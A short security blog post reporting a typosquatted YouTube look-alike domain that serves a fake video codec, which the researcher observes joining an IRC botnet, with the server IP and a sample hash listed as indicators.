YouTube typo delivers IRC Bot
UPDATE:
The file is compressed with professional software (Armadillo) making the unpacking process almost impossible.
Once executed, the file uses some in-memory protection by running these two processes.
——–
Fresh from our HoneyPot we discovered a malware site using a typo in its domain name.
The site youtorube.com will push a fake video codec, on what appears to be a YouTube page (in Italian).
The domain is registered to:
Pretty soon after running the fake codec, I observed IRC traffic with the same IP address:
This lets me know that I am part of an IRC channel:
The IRC server’s IP (87.98.184.231) has some interesting connections, including a “p0nwed.de” domain. Hmm… 
I attempted to connect to that IRC channel manually, however the channel requires a key… In other words, I am not welcome.
Further analysis of the malware binary may reveal the channel’s key hard-coded.
The file itself is detected as:
Our Heuristic engine already detected it as:
However, at that point I have aggregated enough data to determine that this ‘codec’ actually turns your machine into a Bot, which is not a good thing.
Jerome Segura
Malware ID: f028c315649b7319e8ef2cc22dc67690.zip
Comments:
|
|
